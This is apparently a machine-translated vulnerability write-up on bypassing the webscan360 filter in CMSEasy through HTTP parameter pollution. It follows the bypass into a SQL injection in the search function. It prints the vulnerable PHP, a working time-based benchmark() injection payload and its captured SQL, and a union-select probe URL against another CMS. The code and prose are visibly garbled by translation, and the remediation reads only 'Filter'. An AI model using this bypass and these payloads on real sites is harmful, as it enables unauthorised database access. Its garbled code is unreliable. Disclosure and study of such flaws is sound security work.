Cms vendors using webscan360 can invalidate it through hpp (with cmseasy new SQL injection)

Cms vendors using webscan360 can invalidate it through hpp (with cmseasy new SQL injection)

Cms vendors that use webscan360 invalidate it through hpp (with cmseasy new SQL injection). After thinking about it, I don't know whether the vulnerability should be 360 or cmseasy, but I finally confirmed the high speed cmseasy.

The latest version of cmseasy is installed by default.

Webscan_cache.php:

$webscan_white_url = array('index.php' => 'admin_dir=admin','index.php' => 'case=file','index.php' =>'case=admin');

Then, let's look at it again.

360webscan. php:

if ($webscan_switch&&webscan_white($webscan_white_directory,$webscan_white_url)) {    if ($webscan_get) {    foreach($_GET as $key=>$value) {      webscan_StopAttack($key,$value,$getfilter,"GET");    }

First Condition

$ Webscan_switch: The value is 1 at initialization.

The second condition is not only checked if it is not true.

Follow webscan_white:
 

function webscan_white($webscan_white_name,$webscan_white_url=array()) {  $url_path=$_SERVER['SCRIPT_NAME'];  $url_var=$_SERVER['QUERY_STRING'];  if (preg_match("/".$webscan_white_name."/is",$url_path)==1&&!empty($webscan_white_name)) {    return false;  }  foreach ($webscan_white_url as $key => $value) {    if(!empty($url_var)&&!empty($value)){      if (stristr($url_path,$key)&&stristr($url_var,$value)) {        return false;      }    }    elseif (empty($url_var)&&empty($value)) {      if (stristr($url_path,$key)) {        return false;      }    }  }  return true;}

This function does not perform much analysis. It is extracted from the whitelist. If the function meets the conditions, no detection is performed.

If (stristr ($ url_path, $ key) & stristr ($ url_var, $ value )){

Return false;

}

Obviously, if the request is $ key and $ value is included in the parameter, false is returned.

According to the analysis just now, the default whitelist

In the request we send, case = admin will not be defended.

According to the hpp apache definition parameter case = admin & case = 123, the final server obtains case = 123.

So this will not affect the logic.

Sending url:
 

 

It can be seen that defense does not work

Check whether SQL injection is available.

Archive_act.php:

Function search_action () {// print_r ($ _ SESSION); exit (); if (front: get ('ule') {front :: $ get ['keyword'] = str_replace ('-', '%', front: $ get ['keyword']); front :: $ get ['keyword'] = urldecode (front: $ get ['keyword']);} if (front: get ('keyword ')&&! Front: post ('keyword') front: $ post ['keyword'] = front: get ('keyword'); front: check_type (front :: post ('keyword'), 'safe '); if (front: post ('keyword') {$ this-> view-> keyword = trim (front :: post ('keyword'); session: set ('keyword', trim (front: post ('keyword');/* if (isset (front :: $ get ['keyword']) front: redirect (preg_replace ('/keyword = [^ &] +/', 'keyword= '. urlencode ($ this-> view-> keyword), front: $ uri) ); Else front: redirect (front: $ uri. '& keyword = '. urlencode ($ this-> view-> keyword); */} else {$ this-> view-> keyword = session: get ('keyword ');} if (preg_match ('/union/I', $ this-> view-> keyword) | preg_match ('/"/I', $ this-> view-> keyword) | preg_match ('/\'/I ', $ this-> view-> keyword) {exit ('invalid parameter');} $ path = ROOT. '/data/hotsearch /'. urlencode ($ this-> view-> keyword ). '.txt '; $ mtime = @ filemtime ($ path ); $ Time = intval (config: get ('search _ Time '))? Intval (config: get ('search _ Time'): 30; if (time ()-$ mtime <$ time &&! Front: get ('page') {// alertinfo ($ time. 'repeated searches cannot be performed within seconds', 'index. php? T = '. front: get ('T');} $ keywordcount = @ file_get_contents ($ path); $ keywordcount = $ keywordcount + 1; file_put_contents ($ path, $ keywordcount ); $ type = $ this-> view-> category; $ condition = ""; if (front: post ('catid') {$ cateobj = category :: getInstance (); $ sons = $ cateobj-> sons (front: post ('catid'); if (is_array ($ sons )&&! Empty ($ sons) {$ cids = front: post ('catid '). ','. implode (',', $ sons);} else {$ cids = front: post ('catid');} $ condition. = "catid in (". $ cids. ") AND ";

If post [catid] is submitted here, it constitutes an SQL injection.

We are following up:

function getrows($condition='',$limit=1,$order='1 desc',$cols='*') {        $this->condition($condition);        $this->record_count=$this->rec_count($condition);        $res=$this->rec_select($condition,$limit,'*',$order);        return $res;    }

function condition(&$condition) {            if (isset($condition) &&is_array($condition)) {            $_condition=array();            foreach ($condition as $key=>$value) {                //$value=str_replace("'","\'",$value);                $key = htmlspecialchars($key,ENT_QUOTES);                if(preg_match('/(if|select|ascii|from|sleep)/i', $value)){                    //echo $condition;                    exit('sql inject');                }                if(preg_match('/(if|select|ascii|from|sleep)/i', $key)){                    //echo $condition;                    exit('sql inject');                }                $_condition[]="`$key`='$value'";            }            $condition=implode(' and ',$_condition);        }        else if (is_numeric($condition)) {            if(preg_match('/(if|select|ascii|from|sleep)/i', $condition)){                //echo $condition;                exit('sql inject');            }            $this->getFields();            $condition="`$this->primary_key`='$condition'";        }else if(true === $condition){        $condition = 'true';        }else{        //echo $condition." __ ";        if(preg_match('/(if|select|ascii|from|sleep)/i', $condition)){        //echo $condition;        exit('sql inject');        }        }

I found that I had another layer of defense. I can only use banchmark here.

Url:

Http: // localhost: 8081/cmseasy/uploads/index. php? Case = admin & case = archive & act = search & catid = 8

Postdata:

Catid = 3) and benchmark (10000000, md5 (123 ))#

Delay of 7 seconds

Captured SQL:

17: 58 SELECT * FROM 'cmseasy _ archive' WHERE catid in (3) and benchmark (10000000, md5 (123) #) AND (title like '% ') and (state is null or state <> '-1') order by 'storder', 1 DESC limit 0, 12

Check a cms:

YYjia cms

Sending url:

Http: // localhost: 8081/index. php? M = admin & ac = register & a = 1 union select 1, 2, 3, 4


 

 

Solution:

Filter